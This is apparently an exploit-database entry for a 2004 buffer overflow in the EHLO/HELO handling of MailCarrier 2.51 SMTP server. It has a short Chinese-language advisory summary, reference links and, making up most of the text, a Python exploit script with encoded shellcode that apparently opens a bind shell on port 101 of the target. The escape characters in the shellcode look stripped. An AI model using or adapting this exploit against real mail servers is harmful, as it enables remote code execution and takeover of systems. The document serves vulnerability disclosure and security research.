https://www.exploit-db.com/exploits/598
https://cxsecurity.com/issue/WLB-2020060085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200410-022

MailCarrierSMTPserver是一款功能强大的SMTP服务程序。MailCarrierSMTPserver对EHLO/HELO命令处理不正确，远程攻击者可以利用这个漏洞对服务进程进行缓冲区溢出，可能以进程权限执行任意指令。提交包含超长参数的EHLO/HELO命令，可触发缓冲区溢出，精心构建提交数据可能以进程权限执行任意指令。

#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow 	#
# Advanced, secure and easy to use FTP Server. 	    	#
# 23 Oct 2004 - muts                                	#
#########################################################
# D:BO>mailcarrier-2.5-EHLO.py                       	#
#########################################################
# D:datatools>nc -v 192.168.1.32 101			#
# localhost [127.0.0.1] 101 (hostname) open		#
# Microsoft Windows 2000 [Version 5.00.2195]		#
# (C) Copyright 1985-2000 Microsoft Corp.		#
# C:WINNTsystem32>					#
#########################################################

import struct
import socket

print "nn###############################################"
print "nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "nFound & coded by muts [at] whitehat.co.il"
print "nFor Educational Purposes Only!n" 
print "nn###############################################"

def make_overflow_dummy(overflow_len, retaddr):
    return 'A' * overflow_len + struct.pack('<L', retaddr)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sc2 = "xEB"
sc2 += "x0Fx58x80x30x88x40x81x38x68x61x63x6Bx75xF4xEBx05xE8xECxFFxFF"
sc2 += "xFFx60xDEx88x88x88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03xDCx8D"
sc2 += "xF0x89x62x03xC2x90x03xD2xA8x89x63x6BxBAxC1x03xBCx03x89x66xB9"
sc2 += "x77x74xB9x48x24xB0x68xFCx8Fx49x47x85x89x4Fx63x7AxB3xF4xACx9C"
sc2 += "xFDx69x03xD2xACx89x63xEEx03x84xC3x03xD2x94x89x63x03x8Cx03x89"
sc2 += "x60x63x8AxB9x48xD7xD6xD5xD3x4Ax80x88xD6xE2xB8xD1xECx03x91x03"
sc2 += "xD3x84x03xD3x94x03x93x03xD3x80xDBxE0x06xC6x86x64x77x5Ex01x4F"
sc2 += "x09x64x88x89x88x88xDFxDExDBx01x6Dx60xAFx88x88x88x18x89x88x88"
sc2 += "x3Ex91x90x6Fx2Cx91xF8x61x6DxC1x0ExC1x2Cx92xF8x4Fx2Cx25xA6x61"
sc2 += "x51x81x7Dx25x43x65x74xB3xDFxDBxBAxD7xBBxBAx88xD3x05xC3xA8xD9"
sc2 += "x77x5Fx01x57x01x4Bx05xFDx9CxE2x8FxD1xD9xDBx77xBCx07x77xDDx8C"
sc2 += "xD1x01x8Cx06x6Ax7AxA3xAFxDCx77xBFx77xDDxB8xB9x48xD8xD8xD8xD8"
sc2 += "xC8xD8xC8xD8x77xDDxA4x01x4FxB9x53xDBxDBxE0x8Ax88x88xEDx01x68"
sc2 += "xE2x98xD8xDFx77xDDxACxDBxDFx77xDDxA0xDBxDCxDFx77xDDxA8x01x4F"
sc2 += "xE0xCBxC5xCCx88x01x6Bx0Fx72xB9x48x05xF4xACx24xE2x9DxD1x7Bx23"
sc2 += "x0Fx72x09x64xDCx88x88x88x4ExCCxACx98xCCxEEx4FxCCxACxB4x89x89"
sc2 += "x01xF4xACxC0x01xF4xACxC4x01xF4xACxD8x05xCCxACx98xDCxD8xD9xD9"
sc2 += "xD9xC9xD9xC1xD9xD9xDBxD9x77xFDx88xE0xFAx76x3Bx9Ex77xDDx8Cx77"
sc2 += "x58x01x6Ex77xFDx88xE0x25x51x8Dx46x77xDDx8Cx01x4BxE0x77x77x77"
sc2 += "x77x77xBEx77x5Bx77xFDx88xE0xF6x50x6AxFBx77xDDx8CxB9x53xDBx77"
sc2 += "x58x68x61x63x6Bx90"

# Change RET address as need be.

#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + 'x90' * 32 + sc2  # RET Win2000 SP4 ENG
buffer = make_overflow_dummy(5097, 0x7d17dd13) + 'x90' * 32 + sc2  #RET WinXP SP2 ENG

try:
	print "nSending evil buffer..."
	s.connect(('127.0.0.1',25))
	s.send('EHLO ' + buffer + 'rn')
	data = s.recv(1024)
	s.close()
	print "nDone! Try connecting to port 101 on victim machine."
except:
	print "Could not connect to SMTP!"

# milw0rm.com [2004-10-26]

来源:XF
名称:mailcarrier-ehlo-helo-bo(17861)
链接:http://xforce.iss.net/xforce/xfdb/17861
来源:BID
名称:11535
链接:http://www.securityfocus.com/bid/11535
来源:SECUNIA
名称:12999
链接:http://secunia.com/advisories/12999
来源:BUGTRAQ
名称:20041026MailCarrier2.51SMTPserverBufferOverflow[PoCincluded]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109880961630050&w;=2